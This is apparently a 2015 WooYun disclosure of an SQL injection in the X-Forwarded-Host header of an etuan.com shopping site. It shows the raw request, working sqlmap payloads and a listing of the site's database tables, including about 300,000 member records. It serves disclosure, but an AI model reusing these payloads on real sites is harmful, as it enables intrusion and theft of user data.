Vulnerability summary

Defect ID: wooyun-2015-0148054

Title: SQL injection on a 一团网 (etuan.com) site (nearly 300,000 (30W) user records affected)

Vendor: 一团网 (etuan.com)

Author: 深度安全实验室 (Deep Security Lab)

Submitted: 2015-10-20 16:18

Fix time: 2015-10-25 16:20

Published: 2015-10-25 16:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: The vendor was notified of the vulnerability but chose to ignore it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-20: Details sent to the vendor, awaiting the vendor's response
2015-10-25: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

Detailed description:

The injection point is the X-Forwarded-Host request header of the following request, confirmed with sqlmap (output below):

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-Host: *
Cookie: PHPSESSID=c7479b62fd4ccbc6270dce14b8ceb80e; 28BB_goodsnum=0; Hm_lvt_09d2747522ea08ffa2a908736b5dc25f=1445321841,1445321943; Hm_lpvt_09d2747522ea08ffa2a908736b5dc25f=1445321943; _ga=GA1.2.1778601477.1445321842; _gat=1; HMVT=09d2747522ea08ffa2a908736b5dc25f|1445321852|; HMACCOUNT=7C4ADD99F4AFA2FB
Host: xiaocaocms.etuan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

(screenshot: 11.png)

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: -1777' OR 7580=7580#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: -1721' OR 1 GROUP BY CONCAT(0x716b627871,(SELECT (CASE WHEN (9395=9395) THEN 1 ELSE 0 END)),0x71787a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))SWfW)#
---
back-end DBMS: MySQL 5.0.12
Database: etuan_shopnc_db
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| shopnc_message | 310948 |
| shopnc_member | 299818 | // users
| shopnc_flowstat_1 | 268265 |
| shopnc_sns_visitor | 253128 |
| shopnc_flowstat_3 | 244678 |
| shopnc_flowstat_5 | 239343 |
| shopnc_points_log | 232545 |
| shopnc_flowstat_4 | 223993 |
| shopnc_flowstat_2 | 218631 |
| shopnc_evaluate_goods | 193609 |
| shopnc_order_log | 182730 |
| shopnc_bili_log | 151305 |
| shopnc_voucher | 123408 |
| shopnc_order_goods | 113031 |
| shopnc_order | 112378 | // orders
| shopnc_voucher_password | 109707 |
| shopnc_ips | 66905 |
| shopnc_predeposit_log | 57816 |
| shopnc_predeposit_log_2 | 53099 |
| shopnc_order_address | 50717 |
| shopnc_evaluate_store | 41325 |
| shopnc_salenum | 25360 |
| shopnc_goods_param | 20607 |
| shopnc_sms_log | 20556 |
| shopnc_address | 20132 |
| shopnc_goods_attr_index | 10308 |
| shopnc_kami | 7920 |
| shopnc_album_pic | 7533 |
| shopnc_goods_spec | 7194 |
| shopnc_weixin_user | 6151 |
| shopnc_cart | 5054 |
| shopnc_goods_spec_index | 4933 |
| shopnc_goods | 4546 |
| shopnc_refund_log | 3549 |
| shopnc_evaluate_goodsstat | 2870 |
| shopnc_bill | 2748 |
| shopnc_predeposit_cash | 2549 |
| shopnc_adv_click | 2423 |
| shopnc_fychoujiang | 2077 |
| shopnc_predeposit_recharge | 1845 |
| shopnc_favorites | 1824 |
| shopnc_zhuanpan | 1520 |
| shopnc_goods_class_staple | 1362 |
| shopnc_gold_log | 1311 |
| shopnc_store_class_goods | 1305 |
| shopnc_goods_group | 1232 |
| shopnc_groupbuy_template | 1220 |
| shopnc_evaluate_storestat | 1185 |
| shopnc_consult | 987 |
| shopnc_p_xianshi_goods | 931 |
| shopnc_album_class | 910 |
| shopnc_mb_user_token | 897 |
| shopnc_sns_albumclass | 885 |
| shopnc_store_extend | 836 |
| shopnc_store | 831 |
| shopnc_complain_goods | 634 |
| shopnc_store_goods_class | 614 |
| shopnc_complain | 597 |
| shopnc_zadan | 492 |
| shopnc_sns_friend | 489 |
| shopnc_sns_albumpic | 446 |
| shopnc_sns_tracelog | 406 |
| shopnc_adv | 360 |
| shopnc_shiming | 339 |
| shopnc_fenxiao_to | 304 |
| shopnc_article | 282 |
| shopnc_attribute_value | 272 |
| shopnc_p_xianshi | 269 |
| shopnc_sns_s_tracelog | 242 |
| shopnc_sns_sharegoods | 231 |
| shopnc_voucher_template | 225 |
| shopnc_adv_position | 191 |
| shopnc_sns_goods | 181 |
| shopnc_gold_buy | 179 |
| shopnc_voucher_quota | 179 |
| shopnc_p_xianshi_quota | 164 |
| shopnc_tuijian | 147 |
| shopnc_p_xianshi_apply | 141 |
| shopnc_goodsyuding | 131 |
| shopnc_setting | 130 |
| shopnc_voucher_apply | 122 |
| shopnc_goods_class | 115 |
| shopnc_return_goods | 113 |
| shopnc_return | 112 |
| shopnc_store_class | 92 |
| shopnc_recommend_goods | 88 |
| shopnc_cards | 78 |
| shopnc_goods_class_tag | 77 |
| shopnc_store_watermark | 72 |
| shopnc_activity_detail | 58 |
| shopnc_web_code | 56 |
| shopnc_map | 54 |
| shopnc_daddress | 52 |
| shopnc_link | 51 |
| shopnc_spec_value | 48 |
| shopnc_express | 47 |
| shopnc_brand | 44 |
| shopnc_attribute | 28 |
| shopnc_voucher_price | 28 |
| shopnc_complain_talk | 27 |
| shopnc_p_mansong_rule | 27 |
| shopnc_pd_log | 26 |
| shopnc_mail_msg_temlates | 24 |
| shopnc_p_mansong | 24 |
| shopnc_sns_mtagmember | 24 |
| shopnc_points_order | 23 |
| shopnc_points_orderaddress | 23 |
| shopnc_points_ordergoods | 23 |
| shopnc_points_cart | 22 |
| shopnc_store_gradelog | 20 |
| shopnc_admin | 17 |
| shopnc_huida | 17 |
| shopnc_upload | 17 |
| shopnc_rec_position | 16 |
| shopnc_sns_setting | 16 |
| shopnc_jiangpin | 14 |
| shopnc_seo | 14 |
| shopnc_coupon | 13 |
| shopnc_p_mansong_apply | 13 |
| shopnc_p_mansong_quota | 13 |
| shopnc_points_goods | 13 |
| shopnc_recommend | 13 |
| shopnc_payment | 11 |
| shopnc_type | 11 |
| shopnc_type_spec | 11 |
| shopnc_article_class | 9 |
| shopnc_web | 8 |
| shopnc_mb_home | 7 |
| shopnc_spec | 7 |
| shopnc_fenxiaotxlog | 6 |
| shopnc_gold_payment | 6 |
| shopnc_document | 5 |
| shopnc_groupbuy_class | 5 |
| shopnc_groupbuy_price_range | 5 |
| shopnc_complain_subject | 4 |
| shopnc_inform_subject | 4 |
| shopnc_mb_ad | 4 |
| shopnc_store_grade | 4 |
| shopnc_wenti | 4 |
| shopnc_navigation | 3 |
| shopnc_sns_s_autosetting | 3 |
| shopnc_common_cron | 2 |
| shopnc_inform | 2 |
| shopnc_p_bundling_quota | 2 |
| shopnc_pages | 2 |
| shopnc_sns_comment | 2 |
| shopnc_sns_sharestore | 2 |
| shopnc_transport_extend | 2 |
| shopnc_activity | 1 |
| shopnc_coupon_class | 1 |
| shopnc_groupbuy_area | 1 |
| shopnc_inform_subject_type | 1 |
| shopnc_sns_membertag | 1 |
| shopnc_transport | 1 |
+-----------------------------+---------+

(screenshot: 33.png)

Proof of concept:

Remediation:

Copyright notice: when reproducing, please credit 深度安全实验室@乌云 (Deep Security Lab @ WooYun)


Vendor response

Vendor response:

Severity: No impact; vendor ignored the report

Ignored on: 2015-10-25 16:20

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet